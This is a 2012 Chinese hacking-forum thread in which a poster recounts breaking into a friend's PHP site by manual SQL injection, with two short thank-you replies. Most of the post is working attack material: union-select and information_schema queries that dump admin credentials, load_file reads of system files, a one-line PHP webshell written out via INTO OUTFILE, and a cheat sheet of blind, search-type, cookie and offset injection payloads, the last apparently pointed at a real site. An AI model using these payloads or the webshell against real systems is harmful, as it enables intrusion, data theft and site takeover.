找回密码
 立即注册
查看: 3255|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~" k( `- R. C1 q  M5 A5 A5 c* {( c, F
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
! M8 W0 F( c) y: M: _  w  @我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
/ c, q( S0 b/ J9 P5 z4 G如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
1 w3 k9 w# j' [2 L5 c& U# b$ X1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)" F6 k1 A* G. S0 {
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:; O5 h+ y' A* j8 z$ E
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in8 y* [1 E6 m' m; H! p2 S+ M
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
" @% a- p7 e0 F; N* j! w) ?                        
& q9 h  m3 K2 O2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
& g. x" p: J- ~3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
: [! w# W7 C. k. X$ p* m4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息) G! |) F" S0 t. Z/ K) K8 D! l8 t& h
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。: A: @* M( E& i, f
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
& Y  Q0 o) Z2 b2 f4 S) V/ y% n1 P2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
0 F& \, m  _& J# \+ Z+ T8 `我就用的是第二个思路,5 N. z  \. o) d1 a2 d6 M
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
& D, E* b8 r6 `( f# i6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,1 B5 m# U$ d! q0 v% e/ @$ O$ I8 [3 I6 I
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
% d' y7 ^5 B  Q* }3 I注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
. U: t5 i1 x. n- A4 P7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????* `  ]- o- p* ~: g5 W# `
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
+ \. Z1 ]+ C+ z* T# C- z- R9 m提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
. z! H0 I! E- B! n8 t+ u% e$ n$ u然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,+ Z8 |' e# p! d: E+ B  K
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
( X: o* c9 p) `; o! d: G1 E" a下面是一些很普遍注入方式资料:
5 k6 T5 [( _3 Q% I# w8 L1 Q注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
% Q% N0 B6 `4 E, ^$ V& H拆半法
4 u7 M; J0 Z; H2 }, e3 ]. j######################################
9 B5 R; Z+ r" Z* b- n' oand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。- Y7 O8 @( Y5 `- F5 ^2 p( a
and exists (select * from admin)
& ^6 c' F! Q: j/ I4 ~and exists(select id from admin)
$ l* @1 l+ S9 P% a7 V( n1 ?& Band exists(select id from admin where id=1)$ ]6 P/ F- W7 K
and exists(select id from admin where id>1)
8 d/ }3 E7 |" V  }然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 * A" H% W, x2 k% s& h' O
and exists (select username from admin)$ o# _+ K3 J5 o6 x8 \
and exists (select password from admin)
* n) T$ N; W0 D  P1 t' ?and exists (select id from admin where len(username)<10 and id=1)) [) x9 P! y+ N# a
and exists (select id from admin where len(username)>5 and id=1)
! N& U( K/ Q3 \) O3 j7 m1 Oand exists (select id from admin where len(username)=6 and id=1)
# V/ \# N* `! d9 g5 H( jand exists (select id from admin where len(password)<10 and id=1)
1 f" |7 u* ]' J: ^3 i5 tand exists (select id from admin where len(password)>5 and id=1)9 s7 }0 R1 m# [* B1 X
and exists (select id from admin where len(password)=7 and id=1)
+ f' y8 ]: ^# a# Q6 Uand (select top 1 asc(mid(username,1,1)) from admin)=97
. k: M/ m  d( {& N; A返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。. d8 \6 _% \0 b4 r0 Z
猜第二位把username,1,1改成username,2,1就可以了。- o' ]8 g1 X) n* ?/ y+ c; V
猜密码把username改成password就OK了
$ I. o) C8 ^( H6 q% D% H##################################################
! L- U1 k6 u1 o- m! v5 ^0 e搜索型注入! K' S" Z$ h5 V! P6 w
##################################
0 R+ k, \( J5 g9 _2 Z! a6 F%' and 1=1 and '%'='
1 t: |5 P2 G2 u! A%' and exists (select * from admin) and '%'='
- _3 W3 k3 [0 |. H: ]* W%' and exists(select id from admin where id=1) and '%'='
0 o" Y- A$ c: K. _%' and exists (select id from admin where len(username)<10 and id=1) and '%'=', {; E" \) L- n5 L9 ?* l
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
2 [3 N# K7 `# g( u0 n2 s% Y%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
" Z. F% @+ Q% L& e9 y; v5 ^这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='0 V8 n: k9 L4 P; ?7 O* X7 v  {
对于MSSQL数据库,后面可以吧 and '%'='换成--
; j  i8 h8 w4 w3 C8 Y还有一点搜索型注入也可以使用union语句。
( d! C$ o$ b# z& j# o+ l  t########################################################
& x/ p- p! c* z& G% V# ~- n$ _联合查询。% I0 @8 d0 N4 N- @0 {
#####################################% ^) @2 F1 @) ?8 Z
order by 102 p& i8 ]+ S  w( S8 O
and 1=2 union select 1,2,3,4,5,6,7,8,9,10! y( x1 P1 h6 W9 y3 l- @
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
: l; W' b- R( j& {$ P( ~7 c7 dand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
; Z. m# z7 _+ V9 g4 d2 c* N3 v1 S很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
2 c$ M3 Y6 y' z3 b###################################& E4 _" w, H( h% A! O6 X% k/ ^, v
cookie注入
0 H& w& S: B+ ?6 d# ?###############################
' }5 ]3 L; l3 x$ z: hhttp://www.******.com/shownews.asp?id=127
2 X# Q# f  k$ ?! x7 V& Zhttp://www.******.com/shownews.asp+ [6 a6 d) X8 d8 H2 B
alert(="id="+escape("127"));! r8 ^; D" ]1 `0 x* k! P
alert(="id="+escape("127 and 1=1"));  i! `% w$ u( L" `$ x" ^
alert(="id="+escape("127 order by 10"));7 v9 l1 m$ c/ z5 u" U3 {5 ^
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));4 g$ e9 }6 H7 p( `; G& {) w
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
$ p5 J; H: q: Z) G# H+ h这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
. k6 F) }# y, T. W###################################
) R' U% o- M" M1 e& K4 P偏移注入
  p0 A/ z' F* ]9 U, T/ }###########################################################
& B! [1 i3 y6 }6 p3 Munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin' l. A' O) S. S! _$ G# _# ]% @
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
6 P; N" H  E) ~union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
% P7 N, J) C8 u3 f5 o, N* eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
; f7 }& c/ @/ M  s; U- C9 Junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
5 n# d1 y6 y( funion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
2 @6 n# r5 u& w4 N& a$ L8 D4 uunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on7 i9 D" [% r/ I4 L( J
a.id=d.id)2 K3 Q/ g, ^8 p, \1 f2 n; P
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
2 W! W! q% _+ q$ M5 oand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
3 Q& M# d/ k( A1 g5 k0 a7 V  
0 \1 Z' w4 X! f& {============================================================================================================$ c: ~1 q- g2 d# {& j- W& M7 |
1.判断版本
/ Z& ?& O/ `. r' ~& x$ V: ~/ |and ord(mid(version(),1,1))>515 H0 Q8 p9 F! V/ p7 G5 `3 r
返回正常,说明大于4.0版本,支持ounion查询
' e4 ^8 r& a) _. h! D2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解6 }0 q, ?+ S, \' l+ Q, w4 U8 y
and 2=4 union select 1,2,3,4,5,6,7,8,9--9 I0 \1 ^& b" V$ l" \
3.查看数据库版本及当前用户,
: P) G: Z. W0 u' ^; K! x4 Aand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
) _$ R6 B  ]2 d  s  s2 Y4 ^数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
3 P' r! b% [4 e' b) y4.判断有没有写权限  F1 S! ?$ H5 l0 i, a6 I1 O  x( Q
and (select count(*) from MySQL.user)>0--
% v  k* R' ]3 E9 x' U. @/ H6 s+ R- H5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,11 H6 _, s' z& ~3 ?+ U
用不了这个命令,就学习土耳其黑客手法,如下3 \( `5 W/ H2 W! s7 Z
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
5 I8 r% A4 `! u6.爆表,爆库
/ ~6 \2 Z" a+ ~and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--( t% t8 I' {- a( \+ t  k
7.爆列名,爆表
) J6 e& a' \/ U( S6 Y5 l" mand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--5 x3 q4 ]! h- B
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
3 |! E- L9 |* z/ _. g. ?" nand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
  N% ]: q" ?8 u9.爆字段内容
5 V0 T% B; t6 ?% X5 C* |5 vand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--9 R7 T! Z' R2 b* U4 h
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表